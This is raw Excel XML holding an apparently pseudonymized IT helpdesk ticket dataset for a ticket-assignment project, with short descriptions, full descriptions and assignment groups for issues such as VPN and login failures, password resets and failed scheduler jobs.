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eetika\OneDrive\Desktop\Great_lakes\Capstone_ticket_assignment\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B71ADCA4-AE57-4C25-8A30-DB7009CDE7BE}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10420" activeTab="1" xr2:uid="{B782B5BB-5EDC-4FBA-8536-32A0F81DB3D5}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet2" sheetId="2" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="1" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">Sheet1!$A$1:$D$8501</definedName>
  </definedNames>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="3"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="34073" uniqueCount="15983">
  <si>
    <t>Short description</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Assignment group</t>
  </si>
  <si>
    <t>login issue</t>
  </si>
  <si>
    <t>-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and reset the password._x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>GRP_0</t>
  </si>
  <si>
    <t>spxjnwir pjlcoqds</t>
  </si>
  <si>
    <t>outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hmjdrvpb.komuaywn@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
my meetings/skype meetings etc are not appearing in my outlook calendar, can somebody please advise how to correct this?_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>hmjdrvpb komuaywn</t>
  </si>
  <si>
    <t>cant log in to vpn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eylqgodm.ybqkwiam@gmail.com_x000D_
_x000D_
hi_x000D_
_x000D_
i cannot log on to vpn_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>eylqgodm ybqkwiam</t>
  </si>
  <si>
    <t>unable to access hr_tool page</t>
  </si>
  <si>
    <t>xbkucsvz gcpydteq</t>
  </si>
  <si>
    <t xml:space="preserve">skype error </t>
  </si>
  <si>
    <t>owlgqjme qhcozdfx</t>
  </si>
  <si>
    <t>unable to log in to engineering tool and skype</t>
  </si>
  <si>
    <t>eflahbxn ltdgrvkz</t>
  </si>
  <si>
    <t xml:space="preserve">event: critical:HostName_221.company.com the value of mountpoint threshold for /oracle/SID_37/erpdata21/ </t>
  </si>
  <si>
    <t>event: critical:HostName_221.company.com the value of mountpoint threshold for /oracle/SID_37/erpdata21/sr3psa1d_7/sr3psa1d.data7,perpsr3psa1d,4524 is 98</t>
  </si>
  <si>
    <t>GRP_1</t>
  </si>
  <si>
    <t>jyoqwxhz clhxsoqy</t>
  </si>
  <si>
    <t>ticket_no1550391- employment status - new non-employee [enter user's name]</t>
  </si>
  <si>
    <t>eqzibjhw ymebpoih</t>
  </si>
  <si>
    <t>unable to disable add ins on outlook</t>
  </si>
  <si>
    <t>mdbegvct dbvichlg</t>
  </si>
  <si>
    <t>ticket update on inplant_874773</t>
  </si>
  <si>
    <t>fumkcsji sarmtlhy</t>
  </si>
  <si>
    <t>engineering tool says not connected and unable to submit reports</t>
  </si>
  <si>
    <t>badgknqs xwelumfz</t>
  </si>
  <si>
    <t>hr_tool site not loading page correctly</t>
  </si>
  <si>
    <t>dcqsolkx kmsijcuz</t>
  </si>
  <si>
    <t>unable to login to hr_tool to sgxqsuojr xwbesorf cards</t>
  </si>
  <si>
    <t>oblekmrw qltgvspb</t>
  </si>
  <si>
    <t>user wants to reset the password</t>
  </si>
  <si>
    <t>iftldbmu fujslwby</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open payslips </t>
  </si>
  <si>
    <t>epwyvjsz najukwho</t>
  </si>
  <si>
    <t>ticket update on inplant_874743</t>
  </si>
  <si>
    <t>unable to login to company vpn</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: xyz@company.com
hi,
i am unable to login to company vpn website, trying to open a new session using the below link, but not able to get through pls help urgently as we are working from home tomorrow due to month end closing. </t>
  </si>
  <si>
    <t>chobktqj qdamxfuc</t>
  </si>
  <si>
    <t>when undocking pc , screen will not come back</t>
  </si>
  <si>
    <t>GRP_3</t>
  </si>
  <si>
    <t>sigfdwcj reofwzlm</t>
  </si>
  <si>
    <t>erp SID_34 account locked</t>
  </si>
  <si>
    <t>nqdyowsm yqerwtna</t>
  </si>
  <si>
    <t>unable to sign into vpn</t>
  </si>
  <si>
    <t>ftsqkvre bqzrupic</t>
  </si>
  <si>
    <t>unable to check payslips</t>
  </si>
  <si>
    <t>mrzgjdal whnldmef</t>
  </si>
  <si>
    <t>vpn issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ugephfta.hrbqkvij@gmail.com_x000D_
_x000D_
hello helpdesk_x000D_
_x000D_
i am not able to connect vpn from home office. couple f hours ago i was connected, now it is not working anymore. getting a message that my session expired but if i click on the link, nothing happens._x000D_
_x000D_
[cid:image001.jpg@01d233aa.3f618be0]_x000D_
_x000D_
*********************_x000D_
_x000D_
need help with your dynamics crm?_x000D_
click here&lt;_x000D_
_x000D_
chat with a live agent regarding your dynamics crm questions now! click here&lt;_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>ugephfta hrbqkvij</t>
  </si>
  <si>
    <t>unable to connect to vpn</t>
  </si>
  <si>
    <t>pfmcnahv ofzlusri</t>
  </si>
  <si>
    <t>user called for vendor phone number</t>
  </si>
  <si>
    <t>vpn not working</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dceoufyz.saufqkmd@gmail.com
hello,
i'm not being able to connect to company network through the vpn. pls check.
cc: sir-i am not being able to upload as a result of no company network.
</t>
  </si>
  <si>
    <t>dceoufyz saufqkmd</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_37 password reset </t>
  </si>
  <si>
    <t>jqhtkfsm xoehtbnl</t>
  </si>
  <si>
    <t>unable to login to hr_tool to check payslips</t>
  </si>
  <si>
    <t>dtisfuyp fpvrjlkz</t>
  </si>
  <si>
    <t>account locked out</t>
  </si>
  <si>
    <t>lduqxywt wcydjgvl</t>
  </si>
  <si>
    <t>unable to login to hr_tool</t>
  </si>
  <si>
    <t>mwebfhdz csndrxgi</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log in to erp SID_34 </t>
  </si>
  <si>
    <t>hvskpglx bpsfxmon</t>
  </si>
  <si>
    <t>password reset for collaboration_platform</t>
  </si>
  <si>
    <t>wrlzneit ayqutwgh</t>
  </si>
  <si>
    <t>reset  users</t>
  </si>
  <si>
    <t xml:space="preserve">hi
please reset users password
client id: 794
username : xyz
</t>
  </si>
  <si>
    <t>qcehailo wqynckxg</t>
  </si>
  <si>
    <t>duplication of network address.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kxsceyzo.naokumlb@gmail.com
gentles,
i have two devices that are trying to share an ip address. they are trying to share 96.26.27.9619. one is a printer with the hostname of prtjc0074, and the other is a new display for erp. the display is using dhcp to get its address assigned and the printer is hard coded.
my guess is that the address 96.26.27.9619 did not get set to a static address in dhcp. i need this corrected so the display will pick up another address.
</t>
  </si>
  <si>
    <t>GRP_4</t>
  </si>
  <si>
    <t>kxsceyzo naokumlb</t>
  </si>
  <si>
    <t>ess password reset</t>
  </si>
  <si>
    <t>fsqwkbez eudsantq</t>
  </si>
  <si>
    <t>unable to install flash player</t>
  </si>
  <si>
    <t>xzbhmfpg bhqxesym</t>
  </si>
  <si>
    <t xml:space="preserve">ticket_no1564677-employment status - new non-employee </t>
  </si>
  <si>
    <t xml:space="preserve">ticket_no1564677-employment status - new non-employee _x000D_
</t>
  </si>
  <si>
    <t>erp SID_34 account unlock and password reset</t>
  </si>
  <si>
    <t>ztlvkmyi xldyitwz</t>
  </si>
  <si>
    <t>unable to resolve ticket_no assigned to self</t>
  </si>
  <si>
    <t>the status button is dierppearing after a few seconds.</t>
  </si>
  <si>
    <t>shloyakw jztsxdln</t>
  </si>
  <si>
    <t>installing engineering tool</t>
  </si>
  <si>
    <t>need to install engineering tool on the pc</t>
  </si>
  <si>
    <t>qcxivzag vyucbagx</t>
  </si>
  <si>
    <t>call for ecwtrjnq jpecxuty</t>
  </si>
  <si>
    <t>olckhmvx pcqobjnd</t>
  </si>
  <si>
    <t>ticket update - inplant_874615</t>
  </si>
  <si>
    <t>tablet 7350-sound not working</t>
  </si>
  <si>
    <t>eqxakzyi cwfrjitq</t>
  </si>
  <si>
    <t>unable to login to system</t>
  </si>
  <si>
    <t>zcaeryfo tdovhslb</t>
  </si>
  <si>
    <t>please reroute jobs on printer01 to printer02 - issue needs to be resolved today</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yisohglr.uvteflgb@gmail.com
hi -
the printer01 printer is not working and needs a part replaced.  can you reroute the jobs in queue to printer printer02?   wihuyjdo qpogfwkb has indicated that prqos001 needs a new part and it may not deliver for a few days so the inwarehouse_tools will need to print on printer02 for now.  this needs to be taken care of today since the inwarehouse_tools are printed and are picked up by an outside vendor at 2:30 pm in usa on a daily basis.   please contact dkmcfreg anwmfvlgenkataramdntyana if you have questions about the jobs in queue for today.
</t>
  </si>
  <si>
    <t>GRP_5</t>
  </si>
  <si>
    <t>yisohglr uvteflgb</t>
  </si>
  <si>
    <t>unable to login to hr_tool etime</t>
  </si>
  <si>
    <t>wxdrynag hlktazfm</t>
  </si>
  <si>
    <t>can not log into hr_tool etime through single sign on portal</t>
  </si>
  <si>
    <t>wpdxlbhz etvzjmhx</t>
  </si>
  <si>
    <t>password changed in password_management_tool but didnt update for erp account</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1424 failed in job_scheduler at: 10/31/2016 09:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1424 failed in job_scheduler at: 10/31/2016 09:06:00</t>
  </si>
  <si>
    <t>GRP_6</t>
  </si>
  <si>
    <t>bpctwhsn kzqsbmtp</t>
  </si>
  <si>
    <t>windows password change via password_management_tool</t>
  </si>
  <si>
    <t>boyqfsca yoqrmnep</t>
  </si>
  <si>
    <t>status does not change on telephony_software</t>
  </si>
  <si>
    <t>when closing a call, the agent keeps on the "on acd call" status.</t>
  </si>
  <si>
    <t>GRP_7</t>
  </si>
  <si>
    <t>aofnvyzt eqiyskhm</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_dly_merktc3 failed in job_scheduler at: 10/31/2016 08:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_dly_merktc3 failed in job_scheduler at: 10/31/2016 08:36:00</t>
  </si>
  <si>
    <t>GRP_8</t>
  </si>
  <si>
    <t>vip 2 - i need my password_management_tool password manager password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">i need my password_management_tool password manager password reset._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>jwhmqnye xlpvdwre</t>
  </si>
  <si>
    <t>reset scm_software password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: cdbaoqts.wqbsodni@gmail.com
hello,
please reset my scm_software password.
cdbaoqts wqbsodni
global product manager, markhtyeting initiatives
cdbaoqts.wqbsodni@gmail.com&lt;mailto:cdbaoqts.wqbsodni@gmail.com&gt;
</t>
  </si>
  <si>
    <t>cdbaoqts wqbsodni</t>
  </si>
  <si>
    <t>account locked out while in office</t>
  </si>
  <si>
    <t>account kept locking out_x000D_
possible reasons_x000D_
_x000D_
companysecure or mobile device email setup has an incorrect password stored._x000D_
windows and network passwords do not match.</t>
  </si>
  <si>
    <t>kyzhcsrq fwyltvpd</t>
  </si>
  <si>
    <t>skype meeting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dlougnqw.jiuybxew@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
i had to reset my password again and i've lost my option for setting up a skype meeting again.  can you please help me?  i can't recall how you were able to bring it back the last time._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>dlougnqw jiuybxew</t>
  </si>
  <si>
    <t>enquiry on impact rewards</t>
  </si>
  <si>
    <t>enquiry on impact rewards- how to get password reset</t>
  </si>
  <si>
    <t>kpudhygb vnizrdeb</t>
  </si>
  <si>
    <t>need dn for material 3346599/ plant plant_197/ 5019253000     1 pcs  thanks</t>
  </si>
  <si>
    <t xml:space="preserve">need dn for material 3346599/ plant plant_197/ 5019253000     1 pcs  </t>
  </si>
  <si>
    <t>wckrxovs aunsgzmd</t>
  </si>
  <si>
    <t>unlock logon password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cnhkypxw.lafncksi@gmail.com_x000D_
_x000D_
hello,_x000D_
please help to unlock my company net log on password. urgent._x000D_
</t>
  </si>
  <si>
    <t>cnhkypxw lafncksi</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_dly_merktc2 failed in job_scheduler at: 10/31/2016 05:19:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_dly_merktc2 failed in job_scheduler at: 10/31/2016 05:19:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3181 failed in job_scheduler at: 10/31/2016 05:00:00  </t>
  </si>
  <si>
    <t>password changed required for user- abc</t>
  </si>
  <si>
    <t>qslrdpwk mdkivacj</t>
  </si>
  <si>
    <t>issues with outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lkfzibrx.ljnabpgx@gmail.com_x000D_
_x000D_
[cid:image001.png@01d23357.fcbe58b0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>lkfzibrx ljnabpgx</t>
  </si>
  <si>
    <t xml:space="preserve"> urgent - create dlv</t>
  </si>
  <si>
    <t xml:space="preserve">please help , i try to create dlv for this mm's_x000D_
7393673 sto 5019411580/00001_x000D_
7393617 sto 5019329184/00002_x000D_
_x000D_
sto from plant_289 to plant_101 </t>
  </si>
  <si>
    <t>qfnthlam lxvnwuja</t>
  </si>
  <si>
    <t>apac company : two switches are down since 3.45 am et on 10/31.</t>
  </si>
  <si>
    <t>apac company : two switches are down since 3.45 am et on 10/31._x000D_
_x000D_
company-ap-chn-apac-company-2960-access-sw04 _x000D_
company-ap-chn-apac-company-2960-access-sw03.</t>
  </si>
  <si>
    <t>utyeofsk rdyzpwhi</t>
  </si>
  <si>
    <t>error login on to the SID_34 system.</t>
  </si>
  <si>
    <t>error login on to the SID_34 system._x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-user has tried the password_management_tool pwd manager._x000D_
-unlocked the erp id._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>quxtnlgd tqnjyzsm</t>
  </si>
  <si>
    <t>delivery note can't do post goods issue</t>
  </si>
  <si>
    <t xml:space="preserve">d/n #9169754657&amp;8058643570_x000D_
plant:plant_304 to plant_310_x000D_
the issue display:_x000D_
ekpo-sobkz=e; ekpo-umsok=_; ekpo-kzbws&lt;&gt;_ ekpo-kzvbr&lt;&gt;e (note 305582) not supported (check your entry)_x000D_
</t>
  </si>
  <si>
    <t>lyzqrctk cfotnzrx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 10/31/2016 02:29:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 10/31/2016 02:29:00</t>
  </si>
  <si>
    <t>GRP_9</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1854 failed in job_scheduler at: 10/31/2016 01:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1854 failed in job_scheduler at: 10/31/2016 01:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2588 failed in job_scheduler at: 10/31/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2588 failed in job_scheduler at: 10/31/2016 01:30:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2599 failed in job_scheduler at: 10/31/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2599 failed in job_scheduler at: 10/31/2016 01:30:00</t>
  </si>
  <si>
    <t>user locked- user :xyz</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: przndfbo.pldqbhtn@gmail.com
it team,
please kindly  release locked computer for user : xyz
user name : fbmugzrl ahyiuqev
</t>
  </si>
  <si>
    <t>przndfbo pldqbhtn</t>
  </si>
  <si>
    <t>dell 7350: my laptop speakers is not working again and requires your urgent help.</t>
  </si>
  <si>
    <t>my laptop speakers is not working again and requires your urgent help.</t>
  </si>
  <si>
    <t>jgautdmk fpurxzew</t>
  </si>
  <si>
    <t>user needs help to connect to the wireless connection at home.</t>
  </si>
  <si>
    <t>user needs help to connect to the wireless connection at home.
-had the user connect to the lan at home.
-connected to the user system using teamviewer.
-checked the network settings.
-help the user login to the home wireless.
-disconnected the home lan.
-user confirmed that he is able to login to the home wireless.
-issue resolved.</t>
  </si>
  <si>
    <t>imoelsap gxdwkimv</t>
  </si>
  <si>
    <t xml:space="preserve">inc1564062: ticket update </t>
  </si>
  <si>
    <t>pwkrlqbc zslqfmka</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 10/30/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 10/30/2016 23:00:00</t>
  </si>
  <si>
    <t>GRP_10</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 10/30/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 10/30/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 10/30/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 10/30/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">power outage:UK al, 1st and 5th ave sites hard down since at 4:31 pm et on 10/30. </t>
  </si>
  <si>
    <t>mnlazfsr mtqrkhnx</t>
  </si>
  <si>
    <t>power outage : germany, mx: site is hard down since 10/30/2016 10:09 am et</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______10/30/2016 10:09 am et_______________x000D_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____no__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____no____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</si>
  <si>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Job_1424 failed in job_scheduler at: 10/30/2016 10:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1424 failed in job_scheduler at: 10/30/2016 10:35:00</t>
  </si>
  <si>
    <t>ilvortuq zfgrlewm</t>
  </si>
  <si>
    <t xml:space="preserve">user yhmwxsqj ugnthxky having issues logging to outlook. </t>
  </si>
  <si>
    <t>user yhmwxsqj ugnthxky having issues logging to outlook. 
rgtry will be available tomorrow around 9.00 am, he works out of company campus. request you to reach out to him &amp; fix the issue.</t>
  </si>
  <si>
    <t>rdfjsawg zpmxgdcw</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 10/30/2016 02:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrattr failed in job_scheduler at: 10/30/2016 02:20:00</t>
  </si>
  <si>
    <t>engineering tool drawing originals in pdf format are not shown</t>
  </si>
  <si>
    <t xml:space="preserve">hello it service,_x000D_
i need to monitor the manufacturing drawings to approve manufacturing._x000D_
the engineering tool stopped showing pdf originals:_x000D_
_x000D_
process: _x000D_
_x000D_
_x000D_
[[erp] /production_order_interface_vendor/bas_cr 167 - rfc destination production_order_interface_vendor-views-010 not accessible (file cannot be stamped now; ).]_x000D_
  08:06:34  _x000D_
    bapireturnederrorexception_x000D_
    [stack trace]_x000D_
    cadagent.erp.conn.jco.tm.jcoerpmanager.handlereturnstructureorreturntableline(jcoerpmanager.java:379, @(#) $id: jcoerpmanager.java 60470 2015-07-24 09:02:22z wt $)_x000D_
    cadagent.erp.conn.jco.tm.jcoerpmanager.handlereturnstructure(jcoerpmanager.java:360, @(#) $id: jcoerpmanager.java 60470 2015-07-24 09:02:22z wt $)_x000D_
    cadagent.erp.conn.jco.tm.jcoerpmanager.generirtcfunction(jcoerpmanager.java:324, @(#) $id: jcoerpmanager.java 60470 2015-07-24 09:02:22z wt $)_x000D_
    cadagent.objmod.plmfile.checkoutview(plmfile.java:1109, @(#) $id: plmfile.java 182 2016-02-18 19:00:08z aju $)_x000D_
    plm.omf.omforiginalsexport.checkoutbapi(omforiginalsexport.java:337, @(#) $id: omforiginalsexport.java 54279 2014-51.08.85.1636:24z rb $)_x000D_
    plm.omf.omforiginalsexport.downloaddocumentoriginals(omforiginalsexport.java:226, @(#) $id: omforiginalsexport.java 54279 2014-51.08.85.1636:24z rb $)_x000D_
    plm.omf.omforiginalsexport.actionperformed(omforiginalsexport.java:147, @(#) $id: omforiginalsexport.java 54279 2014-51.08.85.1636:24z rb $)_x000D_
    cadagent.gui.obr.obrfunctioneventqueue.run(obrfunctioneventqueue.java:209, @(#) $id: obrfunctioneventqueue.java 51962 2014-07-16 11:28:24z bda $)_x000D_
_x000D_
      [api] bapi_document_checkoutview2_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
is this a known problem? when it will be fixed?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>GRP_11</t>
  </si>
  <si>
    <t>vlymsnej whlqxcst</t>
  </si>
  <si>
    <t xml:space="preserve">job apo_bop_plant_283a failed in job_scheduler at: 10/30/2016 01:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job apo_bop_plant_283a failed in job_scheduler at: 10/30/2016 01:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1315 failed in job_scheduler at: 10/30/2016 00:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1315 failed in job_scheduler at: 10/30/2016 00:48:00</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/30/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/30/2016 00:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open ie </t>
  </si>
  <si>
    <t>tmopbken ibzougsd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3050 failed in job_scheduler at: 10/29/2016 23:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3050 failed in job_scheduler at: 10/29/2016 23:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_30cold failed in job_scheduler at: 10/29/2016 18:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_30cold failed in job_scheduler at: 10/29/2016 18:58:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_35cold failed in job_scheduler at: 10/29/2016 18:47:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_35cold failed in job_scheduler at: 10/29/2016 18:47:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_436 failed in job_scheduler at: 10/29/2016 18:29:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_436 failed in job_scheduler at: 10/29/2016 18:29:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_29cold failed in job_scheduler at: 10/29/2016 18:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_29cold failed in job_scheduler at: 10/29/2016 18:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_717 failed in job_scheduler at: 10/29/2016 18:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_717 failed in job_scheduler at: 10/29/2016 18:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_26cold failed in job_scheduler at: 10/29/2016 18:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_26cold failed in job_scheduler at: 10/29/2016 18:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_35cold failed in job_scheduler at: 10/29/2016 18:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_35cold failed in job_scheduler at: 10/29/2016 18:09:00</t>
  </si>
  <si>
    <t xml:space="preserve">amssm00345: c:\ label:sys-amssm00345 94ef9088 on server: is over  85% space consumed. space available: 2.7 g </t>
  </si>
  <si>
    <t>GRP_12</t>
  </si>
  <si>
    <t>unable to view payslips from hr_tool e time</t>
  </si>
  <si>
    <t>vzrbocfl wxtpoyez</t>
  </si>
  <si>
    <t>password expiry tomorrow</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ecprjbod.litmjwsy@gmail.com
my system says my password expires tomorrow.  but when i want to change to a new password, it does not allow.  the new password is not acceptingâ€¦.it says server does not authorize.  kindly check and do the needful as the password is expiring tomorrow.  </t>
  </si>
  <si>
    <t>ecprjbod litmjwsy</t>
  </si>
  <si>
    <t>re: ess portal access issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: noscwdpm.akiowsmp@gmail.com
hello,
he is an kiosk user.  please reset the password and confirm.
noscwdpm akiowsmp
noscwdpm.akiowsmp@gmail.com
from: ihkolepb ozhnjyef
sent: 29 october 2016 13:38
to: company@ticketing_tool.com
subject: ess portal access issue
hi,
below mentioned employee krlszbqo spimolgz with user id sv123 is not able to login to ess portal to access his pay slips and related contents. he is a attendance_tool user. please reset his user id and password and revert back.
</t>
  </si>
  <si>
    <t>noscwdpm akiowsmp</t>
  </si>
  <si>
    <t>ess portal access issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ihkolepb.ozhnjyef@gmail.com
hi,
below mentioned employee krlszbqo spimolgz with user id sv123 is not able to login to ess portal to access his pay slips and related contents. he is a attendance_tool user. please reset his user id and password and revert back.
</t>
  </si>
  <si>
    <t>ihkolepb ozhnjyef</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1390 failed in job_scheduler at: 10/29/2016 03:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1390 failed in job_scheduler at: 10/29/2016 03:55:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2002 failed in job_scheduler at: 10/29/2016 02:52:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2002 failed in job_scheduler at: 10/29/2016 02:52:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2002 failed in job_scheduler at: 10/29/2016 02:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2002 failed in job_scheduler at: 10/29/2016 02:30:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1319 failed in job_scheduler at: 10/29/2016 02:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1319 failed in job_scheduler at: 10/29/2016 02:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1382 failed in job_scheduler at: 10/29/2016 02:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1382 failed in job_scheduler at: 10/29/2016 02:00:00</t>
  </si>
  <si>
    <t>attendance_tool - system log on error</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: isfadulo.etkyjabn@gmail.com
hello
good morning,
i am experiencing issues with attendance_tool log on
every time i try to log on through "single sign portal, the following screen gets displayed and it stays there.
appreciate your support to fix this issue
[cid:image011.jpg@01d231cb.2cceacf0]
</t>
  </si>
  <si>
    <t>isfadulo etkyjabn</t>
  </si>
  <si>
    <t>excel freezing issue</t>
  </si>
  <si>
    <t>jborwynt gidxbfrq</t>
  </si>
  <si>
    <t xml:space="preserve">unable to sync a file in collaboration_platform </t>
  </si>
  <si>
    <t>utdlmzyb dvfpraeg</t>
  </si>
  <si>
    <t>unable to update password on the password_management_tool password manager</t>
  </si>
  <si>
    <t>vitalyst transfer: reporting_tool access query</t>
  </si>
  <si>
    <t>flhkxeqd gwidroap</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2881 failed in job_scheduler at: 10/28/2016 18:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2881 failed in job_scheduler at: 10/28/2016 18:06:00</t>
  </si>
  <si>
    <t>GRP_13</t>
  </si>
  <si>
    <t xml:space="preserve">user said he will callback </t>
  </si>
  <si>
    <t xml:space="preserve">unable update passwords on password_management_tool </t>
  </si>
  <si>
    <t>xeakyiqt knhjogel</t>
  </si>
  <si>
    <t>erp SID_34 erp production password reset // account is locked</t>
  </si>
  <si>
